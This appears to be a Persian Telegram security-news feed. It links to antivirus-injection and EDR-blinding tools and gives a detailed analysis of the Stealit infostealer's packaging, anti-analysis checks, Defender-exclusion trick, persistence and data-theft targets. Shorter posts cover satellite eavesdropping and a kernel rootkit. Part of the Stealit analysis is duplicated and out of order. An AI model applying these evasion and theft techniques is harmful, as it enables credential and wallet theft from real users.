ایجاد درب پشتی پایدار: بدافزار میتواند خود را در محیط آنتیویروس جای دهد و با هر بار اجرای سیستم، همراه با آنتیویروس اجرا شود و شناسایی آن بسیار دشوار خواهد بود.
غیرفعالسازی پنهانی: کد تزریقشده میتواند بهتدریج و بهصورت پنهانی، قابلیتهای شناسایی آنتیویروس را غیرفعال کند.
اجرای دستورات با بالاترین سطح دسترسی: مهاجم میتواند از این طریق به کل سیستم با دسترسی SYSTEM مسلط شود.
GitHub
GitHub - TwoSevenOneT/IAmAntimalware: This tool helps inject code into the processes of Antivirus programs.
This tool helps inject code into the processes of Antivirus programs. - TwoSevenOneT/IAmAntimalware
ابزار RealBlindingEDR غیرفعالسازی دائمی AV/EDR با استفاده از Kernel Callbackها
ابزاری متنباز که به مهاجمان این امکان را میدهد که با پاکسازی callbackهای حیاتی سطح کرنل در سیستمعامل ویندوز، نرمافزارهای آنتیویروس (AV) و تشخیص و پاسخ نقطه پایانی (EDR) را کور (blind)، بهطور دائم غیرفعال یا خاتمه دهند.
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - myzxcg/RealBlindingEDR: Remove AV/EDR Kernel ObRegisterCallbacks、CmRegisterCallback、MiniFilter Callback、PsSetCreatePr…
تحلیل کمپین بدافزار جدید Stealit
و بهرهبرداری از قابلیت Node.js SEA برای پنهانسازی و گسترش
محققان FortiGuard به تازگی یک کمپین فعال و جدید از بدافزار سرقت اطلاعات Stealit را شناسایی کرده است که از یک تکنیک نوآورانه برای توزیع و اجرای payloadهای خود بهره میبرد. این کمپین با استفاده از قابلیت آزمایشی Single Executable Application (SEA) در Node.js، اسکریپتهای مخرب خود را به صورت یک فایل اجرایی مستقل بستهبندی میکند. این رویکرد به بدافزار اجازه میدهد تا بدون نیاز به پیشنصب بودن Node.js روی سیستم قربانی، اجرا شود و در نتیجه شناسایی آن را دشوارتر میسازد.
در ادامه، تحلیل فنی دقیقی از این کمپین، از مکانیزم توزیع تا اجزای اصلی و تکنیکهای فرار از تحلیل آن ارائه میشود.
زنجیره آلودگی و توزیع
بدافزار Stealit ، همانند نسخههای پیشین، خود را در قالب نصبکنندههای نرمافزارهای قانونی مانند بازیها و برنامههای VPN مخفی میکند. این فایلهای آلوده از طریق پلتفرمهای اشتراکگذاری فایل نظیر Mediafire و Discord توزیع میشوند. مهاجمان برای پیچیدهتر کردن فرآیند تحلیل، این نصبکنندهها را با ابزارهایی مانند PyInstaller بستهبندی کرده یا در آرشیوهای فشرده قرار میدهند.
جالب توجه است که وبسایت پنل کنترل و فرماندهی (C2) این بدافزار نیز به دامنههای جدیدی منتقل شده است. این وبسایت، Stealit را به عنوان یک "راهحل حرفهای استخراج داده" با طرحهای اشتراک مختلف برای سیستمعاملهای ویندوز و اندروید تبلیغ میکند و حتی یک کانال تلگرامی برای جذب مشتریان بالقوه دارد.
تحلیل فنی نصبکننده (Installer)
فرآیند نصب بدافزار چند لایه و بسیار پیچیده است و در تمام مراحل از obfuscation سنگین برای جلوگیری از تحلیل کد استفاده میشود.
#**لایه اول: بهرهبرداری از Node.js SEA**
فایل اجرایی اولیه یک بسته Node.js SEA است. این قابلیت آزمایشی، تمام اسکریپتها و وابستگیهای لازم را در یک فایل باینری واحد جمعآوری میکند. اسکریپت مخرب اصلی در بخشی از منابع فایل اجرایی به نام
NODE_SEA_BLOB ذخیره شده است. بررسی متادیتای این بخش نشان میدهد که این بسته با استفاده از یک پروژه متنباز به نام AngaBlue ساخته شده که فرآیند ایجاد فایلهای اجرایی SEA را خودکار میکند.#**لایههای دوم و سوم: اجرای درون حافظه**
اسکریپت لایه اول پس از اجرا، یک blob بزرگ و رمزنگاریشده را از داخل خود استخراج، رمزگشایی و با استفاده از تابع
require در Node.js مستقیماً در حافظه اجرا میکند. این اسکریپت لایه دوم نیز به نوبه خود، اسکریپت لایه سوم را که باز هم به شدت مبهمسازی شده، در حافظه اجرا میکند. این تکنیک زنجیرهای اجرای درون حافظه، تحلیل مبتنی بر فایل را بسیار دشوار میسازد.تکنیکهای ضد تحلیل (Anti-Analysis)
اسکریپت لایه سوم، پیش از نصب اجزای اصلی، مجموعهای گسترده از بررسیها را برای تشخیص محیطهای تحلیل و ماشینهای مجازی انجام میدهد. این بررسیها شامل موارد زیر است:
* تشخیص محیط مجازی: حداقل حافظه سیستم (2GB)، تعداد هستههای پردازنده (حداقل 2)، و بررسی نام کاربری و نام میزبان در برابر لیست سیاه کلمات کلیدی (مانند
vmware , sandbox , analyst , test ).* بررسی فایلها و مسیرهای مشکوک: جستجو برای فایلها و درایورهای مرتبط با VMware و VirtualBox.
* تحلیل زمانی (Timing Analysis): اندازهگیری زمان اجرای عملیات ریاضی برای تشخیص کندی ناشی از دیباگرها.
* شناسایی فرآیندهای پیشرفته: اجرای دستور
wmic برای لیست کردن تمام فرآیندها و جستجو برای نام ابزارهای تحلیل رایج (مانند wireshark , x64dbg , IDA , Ghidra , Process Monitor ) یا آرگومانهای مرتبط با دیباگ.* بررسی پورتهای شبکه: اجرای
netstat –an برای یافتن پورتهای فعال که در لیست سیاه قرار دارند.* تحلیل رجیستری: بررسی کلیدهای رجیستری مرتبط با دیباگرها.
* تشخیص تزریق DLL: بررسی DLLهای بارگذاریشده در فرآیند بدافزار برای یافتن موارد مرتبط با ابزارهای تحلیل.
* بررسی فرآیند والد (Parent Process): چک کردن فرآیند والد برای اطمینان از اینکه خود توسط یک ابزار تحلیل اجرا نشده باشد.
اگر هر یک از این بررسیها نشان دهد که بدافزار در حال تحلیل است، با نمایش یک پیام خطا، اجرای خود را متوقف میکند.
نصب و ماندگاری اجزای اصلی
پس از عبور موفقیتآمیز از بررسیهای ضد تحلیل، نصبکننده سه کامپوننت اصلی را از سرور C2 دانلود میکند:
save_data.exe , stats_db.exe و game_cache.exe .این فایلها در یک مسیر تصادفی در
AppData\Local ذخیره میشوند و برای جلوگیری از اسکن توسط Windows Defender، مسیر دایرکتوری ایجاد شده با استفاده از یک دستور PowerShell به لیست استثنائات (Exclusion list) آن اضافه میشود.Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
برای ماندگاری ، بدافزار یک اسکریپت Visual Basic به نام
تحلیل کامپوننتهای Payload
کامپوننتهای دانلود شده، برخلاف نصبکننده اولیه که از SEA استفاده میکند، با ابزار متنباز دیگری به نام Pkg بستهبندی شدهاند. هر یک از این کامپوننتها وظیفه مشخصی را دنبال میکنند:
1۔ save_data.exe : این کامپوننت تنها در صورتی اجرا میشود که بدافزار با دسترسی بالا (elevated privileges) اجرا شده باشد. وظیفه اصلی آن استخراج اطلاعات از مرورگرهای مبتنی بر Chromium است. برای این کار، ابزاری به نام
2۔ stats_db.exe: این کامپوننت یک سارق اطلاعات (Info-stealer) قدرتمند است که طیف وسیعی از برنامهها را هدف قرار میدهد. پیش از شروع سرقت، فرآیندهای مرتبط با برنامههای هدف را خاتمه میدهد. اهداف آن عبارتند از:
* مرورگرها: Google Chrome, Microsoft Edge, Mozilla Firefox و دهها مرورگر دیگر.
* برنامههای مرتبط با بازی: Steam, Minecraft, Epic Games Launcher.
* پیامرسانها: WhatsApp, Telegram.
* کیف پولهای ارز دیجیتال: طیف گستردهای از کیف پولهای دسکتاپ (مانند Atomic و Exodus) و افزونههای مرورگر (مانند MetaMask, Coinbase, BinanceChain, Ronin).
3۔ game_cache.exe: این فایل، کلاینت اصلی بدافزار است که مسئولیت ارتباط با سرور C2 و اجرای دستورات مهاجم را بر عهده دارد. پس از اجرا، اطلاعات اولیه قربانی (نام کاربری و شناسه سختافزار) را به سرور ارسال کرده و منتظر دریافت فرمان میماند. این کامپوننت قابلیتهای یک تروجان دسترسی از راه دور (RAT) کامل را فراهم میکند، از جمله:
* مشاهده زنده صفحه نمایش و وبکم.
* اجرای دستورات از راه دور (CMD Executor).
* مدیریت سیستم (خاموش کردن، راهاندازی مجدد).
* سرقت فایلها از مسیرهای حساس.
* نصب و اجرای فایلهای اجرایی دیگر و ایجاد ماندگاری برای آنها.
* تغییر تصویر پسزمینه دسکتاپ.
* استقرار ماژول باجافزار.
بازگشت به فریمورک Electron
نکته بسیار مهم این است که در طول مدت کوتاهی پس از مشاهده این کمپین، نمونههای جدیدی از Stealit شناسایی شدند که به استفاده از فریمورک Electron (همانند کمپینهای قدیمیتر) بازگشته بودند. با این تفاوت که در نسخه جدید، اسکریپتهای Node.js بستهبندی شده با الگوریتم AES-256-GCM رمزنگاری شدهاند. این تغییر تاکتیک سریع، نشاندهنده انطباقپذیری بالای مهاجمان و تلاش مداوم آنها برای فرار از شناسایی است.
startup.vbs در پوشه Startup ویندوز ایجاد میکند که وظیفه اجرای کامپوننت game_cache.exe را در هر بار راهاندازی سیستم بر عهده دارد.تحلیل کامپوننتهای Payload
کامپوننتهای دانلود شده، برخلاف نصبکننده اولیه که از SEA استفاده میکند، با ابزار متنباز دیگری به نام Pkg بستهبندی شدهاند. هر یک از این کامپوننتها وظیفه مشخصی را دنبال میکنند:
1۔ save_data.exe : این کامپوننت تنها در صورتی اجرا میشود که بدافزار با دسترسی بالا (elevated privileges) اجرا شده باشد. وظیفه اصلی آن استخراج اطلاعات از مرورگرهای مبتنی بر Chromium است. برای این کار، ابزاری به نام
cache.exe را که بر پایه پروژه متنباز ChromElevator توسعه یافته، از خود استخراج و اجرا میکند. این ابزار قادر است مکانیزمهای امنیتی مرورگرها را دور بزند.2۔ stats_db.exe: این کامپوننت یک سارق اطلاعات (Info-stealer) قدرتمند است که طیف وسیعی از برنامهها را هدف قرار میدهد. پیش از شروع سرقت، فرآیندهای مرتبط با برنامههای هدف را خاتمه میدهد. اهداف آن عبارتند از:
* مرورگرها: Google Chrome, Microsoft Edge, Mozilla Firefox و دهها مرورگر دیگر.
* برنامههای مرتبط با بازی: Steam, Minecraft, Epic Games Launcher.
* پیامرسانها: WhatsApp, Telegram.
* کیف پولهای ارز دیجیتال: طیف گستردهای از کیف پولهای دسکتاپ (مانند Atomic و Exodus) و افزونههای مرورگر (مانند MetaMask, Coinbase, BinanceChain, Ronin).
3۔ game_cache.exe: این فایل، کلاینت اصلی بدافزار است که مسئولیت ارتباط با سرور C2 و اجرای دستورات مهاجم را بر عهده دارد. پس از اجرا، اطلاعات اولیه قربانی (نام کاربری و شناسه سختافزار) را به سرور ارسال کرده و منتظر دریافت فرمان میماند. این کامپوننت قابلیتهای یک تروجان دسترسی از راه دور (RAT) کامل را فراهم میکند، از جمله:
* مشاهده زنده صفحه نمایش و وبکم.
* اجرای دستورات از راه دور (CMD Executor).
* مدیریت سیستم (خاموش کردن، راهاندازی مجدد).
* سرقت فایلها از مسیرهای حساس.
* نصب و اجرای فایلهای اجرایی دیگر و ایجاد ماندگاری برای آنها.
* تغییر تصویر پسزمینه دسکتاپ.
* استقرار ماژول باجافزار.
بازگشت به فریمورک Electron
نکته بسیار مهم این است که در طول مدت کوتاهی پس از مشاهده این کمپین، نمونههای جدیدی از Stealit شناسایی شدند که به استفاده از فریمورک Electron (همانند کمپینهای قدیمیتر) بازگشته بودند. با این تفاوت که در نسخه جدید، اسکریپتهای Node.js بستهبندی شده با الگوریتم AES-256-GCM رمزنگاری شدهاند. این تغییر تاکتیک سریع، نشاندهنده انطباقپذیری بالای مهاجمان و تلاش مداوم آنها برای فرار از شناسایی است.
دانشگاه MIT یک هوش مصنوعی ساخته که میتونه کد خودش رو بازنویسی کنه تا باهوشتر بشه.
بهش میگن SEAL (مدلهای زبانی خود-تطبیقپذیر) .
به جای اینکه انسانها تنظیمش کنن، SEAL اطلاعات جدید رو خونده، اونا رو با کلمات خودش بازنویسی میکنه و بهروزرسانیهای گرادیان رو روی خودش اجرا میکنه و به معنای واقعی کلمه یادگیری خودراهبر داره.
و ما تازه وارد عصر مدلهای خود-تکاملی شدیم.
Please open Telegram to view this post
VIEW IN TELEGRAM
پژوهشگران دو دانشگاه مطرح آمریکا بمدت سه سال یک آنتن نه چندان پیچیده رو به سمت آسمان گرفتند و به داده هاییکه بین ایستگاهای زمینی و ماهواره ها مبادله میشد گوش دادند. نتیجه تحقیق تکاندهنده هست!
اونها موفق به ضبط هزاران گفتوگوی صوتی و پیام کوتاه رمزنگاری نشده رو از کاربران یک شبکهٔ تلفن همراه شدند. همچنین ارتباطات برخی از نهادهای نظامی و اطلاعاتی در بین داده های ثبت شده وجود داشت که از اهمیت بالایی برخوردارند. این پژوهش نشون میده که نزدیک به نیمی از پیامهای ماهوارهای در مدار ثابت زمین بدون هیچ گونه رمزنگاری مبادله میشوند. یعنی سیلی از دادههای بسیار حساس از فراز زمین عبور میکنند و هر کس با یک ابزار ساده و هزینه ای کمتر از ۸۰۰ دلار قادر به دریافت انهاست.
Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - KittenBusters/CharmingKitten: Exposing CharmingKitten's malicious activity for IRGC-IO Counterintelligence division (1500)
Exposing CharmingKitten's malicious activity for IRGC-IO Counterintelligence division (1500) - KittenBusters/CharmingKitten
تحلیلی عمیق بر یک روتکیت پیشرفته و پنهانکار هسته لینوکس
Singularity - Powerful Linux Kernel Rootkit
Please open Telegram to view this post
VIEW IN TELEGRAM
blog.kyntra.io
Singularity: Deep Dive into a Modern Stealth Linux Kernel Rootkit – Kyntra Blog
Deep dive into a modern stealth Linux kernel rootkit with advanced evasion and persistence techniques